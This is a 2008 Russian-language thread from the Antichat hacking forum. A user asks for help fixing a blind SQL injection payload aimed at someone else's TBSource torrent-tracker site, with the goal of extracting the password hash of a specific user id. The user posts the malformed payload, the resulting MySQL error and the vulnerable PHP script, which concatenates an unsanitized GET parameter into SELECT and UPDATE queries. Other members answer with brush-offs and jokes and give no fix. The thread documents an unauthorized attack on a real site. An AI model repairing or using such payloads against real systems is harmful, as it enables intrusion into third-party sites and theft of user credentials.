Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
не могу понять что за ошибка в sql syntax |
23.12.2008, 21:25
|
|
Новичок
Регистрация: 12.09.2008
Сообщений: 13
Провел на форуме:
170978
Репутация:
1
|
|
не могу понять что за ошибка в sql syntax
здрасте я нашёл один сайт с sql inject`ом, я посмотрел в компе у меня есть тот же скрипт, но мне надо через тот sql inject надо сделати запрос, вот я сделал:
Код:
file.php?requestid=-1+or+id=if(ascii(substring((select+passhash+from+users+where+id=103949),=65,1))1,1,(select+1+union+select+2))+--+
но мне даёт error:
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from users where id=103949),=65,1))1,1,( 1 2)) --' at line 1
понятно что в syntax но не магу найти где имена, скажите пожалуйста в чём я ошибся...  вот скрипт:
Код:
$requestid = $_GET["requestid"];
$res = mysql_query("SELECT userid, filledby FROM requests WHERE id =$requestid") or err();
$arr = mysql_fetch_assoc($res);
if (($USER[id] == $arr[userid]) || (get_class() >= MODERATOR) || ($USER[id] == $arr[filledby]))
{
@mysql_query("UPDATE requests SET filled='', filledby=0 WHERE id =$requestid") or err();
print("Request $requestid successfully reset.");
}
else
print("Sorry, cannot reset a request when you are not the owner");
скажите пожалуйста в чём я ошибся а то я ламаю голову весь день и не могу найти
Последний раз редактировалось downloader; 23.12.2008 в 21:39..
|
|
|
23.12.2008, 22:07
|
|
Новичок
Регистрация: 12.09.2008
Сообщений: 13
Провел на форуме:
170978
Репутация:
1
|
|
ребят ну помогите найти плз ошибку..
|
|
|
|
23.12.2008, 22:18
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
Дай урлу, а то ты написал чёрт знает что....
|
|
|
|
23.12.2008, 22:21
|
|
Banned
Регистрация: 27.04.2008
Сообщений: 683
Провел на форуме:
3248203
Репутация:
628
|
|
ппц это ж надо в болталке постить ...
|
|
|
|
23.12.2008, 22:23
|
|
Новичок
Регистрация: 12.09.2008
Сообщений: 13
Провел на форуме:
170978
Репутация:
1
|
|
sorry.... не могу..
Последний раз редактировалось downloader; 24.12.2008 в 00:30..
|
|
|
|
23.12.2008, 23:01
|
|
Новичок
Регистрация: 12.09.2008
Сообщений: 13
Провел на форуме:
170978
Репутация:
1
|
|
можете обяснити плЗ?
|
|
|
|
24.12.2008, 00:15
|
|
Новичок
Регистрация: 12.09.2008
Сообщений: 13
Провел на форуме:
170978
Репутация:
1
|
|
тиха... |
|
|
|
24.12.2008, 00:23
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Хмм... Вывода кагбе нет
ТС, а подскажи чё это за скриптеги такие... Ну вот ты гриш у тя есть, делись 
Последний раз редактировалось Ponchik; 24.12.2008 в 00:27..
|
|
|
|
24.12.2008, 00:30
|
|
Новичок
Регистрация: 12.09.2008
Сообщений: 13
Провел на форуме:
170978
Репутация:
1
|
|
это стандартный файл в tbsource (движок для тракера)
|
|
|
|
24.12.2008, 00:33
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Спасиба, памог, далбы плюсек да постов у тебя нет
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
